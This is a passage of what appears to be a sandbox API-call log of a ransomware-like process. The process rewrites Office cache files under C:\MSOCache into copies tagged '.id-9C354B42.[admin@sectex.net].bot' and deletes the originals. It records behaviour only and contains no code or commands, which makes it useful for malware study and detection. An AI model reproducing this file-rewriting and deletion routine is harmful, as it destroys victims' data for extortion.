	[0033.811] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.811] lstrlenW (lpString=".1cd") returned 4
	[0033.812] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.812] lstrlenW (lpString=".jpg") returned 4
	[0033.812] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.812] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.812] lstrlenW (lpString="InfoPathMUI.xml") returned 15
	[0033.812] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.813] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1231) returned 1
	[0033.813] CloseHandle (hObject=0x19c) returned 1
	[0033.813] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020
	[0033.813] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.813] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.813] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.813] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.813] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0033.814] GetLastError () returned 0x0
	[0033.814] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x4cf, lpOverlapped=0x0) returned 1
	[0033.815] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x4d0, lpOverlapped=0x0) returned 1
	[0033.816] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.816] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0033.816] SetEndOfFile (hFile=0x1a0) returned 1
	[0033.817] CloseHandle (hObject=0x1a0) returned 1
	[0033.817] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.817] SetEndOfFile (hFile=0x19c) returned 1
	[0033.818] CloseHandle (hObject=0x19c) returned 1
	[0033.818] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.818] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1
	[0033.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.819] lstrlenW (lpString=".doc") returned 4
	[0033.819] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString=".docx") returned 5
	[0033.819] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.819] lstrlenW (lpString=".pdf") returned 4
	[0033.819] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString=".xls") returned 4
	[0033.819] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString=".xlsx") returned 5
	[0033.819] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.819] lstrlenW (lpString=".ppt") returned 4
	[0033.819] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.819] lstrlenW (lpString=".zip") returned 4
	[0033.819] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.819] lstrlenW (lpString=".rar") returned 4
	[0033.819] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString=".bz2") returned 4
	[0033.819] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString=".7z") returned 3
	[0033.819] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.819] lstrlenW (lpString=".dbf") returned 4
	[0033.819] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.819] lstrlenW (lpString=".1cd") returned 4
	[0033.819] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.819] lstrlenW (lpString=".jpg") returned 4
	[0033.819] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.819] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.819] lstrlenW (lpString=".doc") returned 4
	[0033.819] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString=".docx") returned 5
	[0033.820] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.820] lstrlenW (lpString=".pdf") returned 4
	[0033.820] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString=".xls") returned 4
	[0033.820] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString=".xlsx") returned 5
	[0033.820] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.820] lstrlenW (lpString=".ppt") returned 4
	[0033.820] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.820] lstrlenW (lpString=".zip") returned 4
	[0033.820] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.820] lstrlenW (lpString=".rar") returned 4
	[0033.820] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString=".bz2") returned 4
	[0033.820] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString=".7z") returned 3
	[0033.820] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.820] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.820] lstrlenW (lpString=".dbf") returned 4
	[0033.820] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.820] lstrlenW (lpString=".1cd") returned 4
	[0033.820] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.820] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78
	[0033.820] lstrlenW (lpString=".jpg") returned 4
	[0033.820] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.820] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.820] lstrlenW (lpString="Setup.xml") returned 9
	[0033.821] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.821] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1852) returned 1
	[0033.821] CloseHandle (hObject=0x19c) returned 1
	[0033.821] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.821] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.821] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.821] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.821] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.821] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0033.824] GetLastError () returned 0x0
	[0033.824] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x73c, lpOverlapped=0x0) returned 1
	[0033.825] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x740, lpOverlapped=0x0) returned 1
	[0033.826] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.826] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.826] SetEndOfFile (hFile=0x1a0) returned 1
	[0033.826] CloseHandle (hObject=0x1a0) returned 1
	[0033.827] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.827] SetEndOfFile (hFile=0x19c) returned 1
	[0033.828] CloseHandle (hObject=0x19c) returned 1
	[0033.828] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.828] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.828] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.829] lstrlenW (lpString=".doc") returned 4
	[0033.829] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString=".docx") returned 5
	[0033.829] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.829] lstrlenW (lpString=".pdf") returned 4
	[0033.829] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString=".xls") returned 4
	[0033.829] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString=".xlsx") returned 5
	[0033.829] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.829] lstrlenW (lpString=".ppt") returned 4
	[0033.829] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.829] lstrlenW (lpString=".zip") returned 4
	[0033.829] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.829] lstrlenW (lpString=".rar") returned 4
	[0033.829] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString=".bz2") returned 4
	[0033.829] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString=".7z") returned 3
	[0033.829] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.829] lstrlenW (lpString=".dbf") returned 4
	[0033.829] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.829] lstrlenW (lpString=".1cd") returned 4
	[0033.829] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.829] lstrlenW (lpString=".jpg") returned 4
	[0033.829] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.830] lstrlenW (lpString=".doc") returned 4
	[0033.830] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString=".docx") returned 5
	[0033.830] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.830] lstrlenW (lpString=".pdf") returned 4
	[0033.830] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString=".xls") returned 4
	[0033.830] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString=".xlsx") returned 5
	[0033.830] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.830] lstrlenW (lpString=".ppt") returned 4
	[0033.830] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.830] lstrlenW (lpString=".zip") returned 4
	[0033.830] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.830] lstrlenW (lpString=".rar") returned 4
	[0033.830] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString=".bz2") returned 4
	[0033.830] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString=".7z") returned 3
	[0033.830] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.830] lstrlenW (lpString=".dbf") returned 4
	[0033.830] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.830] lstrlenW (lpString=".1cd") returned 4
	[0033.830] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.830] lstrlenW (lpString=".jpg") returned 4
	[0033.830] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.830] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.831] lstrlenW (lpString="Setup.xml") returned 9
	[0033.831] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.033] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=6241) returned 1
	[0034.033] CloseHandle (hObject=0x1ac) returned 1
	[0034.033] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0034.034] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.034] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.034] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.034] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.034] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0034.035] GetLastError () returned 0x0
	[0034.035] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x1861, lpOverlapped=0x0) returned 1
	[0034.037] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1870, lpOverlapped=0x0) returned 1
	[0034.038] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.038] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0034.038] SetEndOfFile (hFile=0x1b0) returned 1
	[0034.038] CloseHandle (hObject=0x1b0) returned 1
	[0034.039] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.039] SetEndOfFile (hFile=0x1ac) returned 1
	[0034.040] CloseHandle (hObject=0x1ac) returned 1
	[0034.040] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.040] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0034.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.040] lstrlenW (lpString=".doc") returned 4
	[0034.040] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.040] lstrlenW (lpString=".docx") returned 5
	[0034.040] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.040] lstrlenW (lpString=".pdf") returned 4
	[0034.040] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.040] lstrlenW (lpString=".xls") returned 4
	[0034.040] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.040] lstrlenW (lpString=".xlsx") returned 5
	[0034.040] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.040] lstrlenW (lpString=".ppt") returned 4
	[0034.040] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.040] lstrlenW (lpString=".zip") returned 4
	[0034.041] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.041] lstrlenW (lpString=".rar") returned 4
	[0034.041] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString=".bz2") returned 4
	[0034.041] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString=".7z") returned 3
	[0034.041] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.041] lstrlenW (lpString=".dbf") returned 4
	[0034.041] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.041] lstrlenW (lpString=".1cd") returned 4
	[0034.041] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.041] lstrlenW (lpString=".jpg") returned 4
	[0034.041] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.041] lstrlenW (lpString=".doc") returned 4
	[0034.041] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString=".docx") returned 5
	[0034.041] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.041] lstrlenW (lpString=".pdf") returned 4
	[0034.041] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString=".xls") returned 4
	[0034.041] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString=".xlsx") returned 5
	[0034.041] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.041] lstrlenW (lpString=".ppt") returned 4
	[0034.041] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.041] lstrlenW (lpString=".zip") returned 4
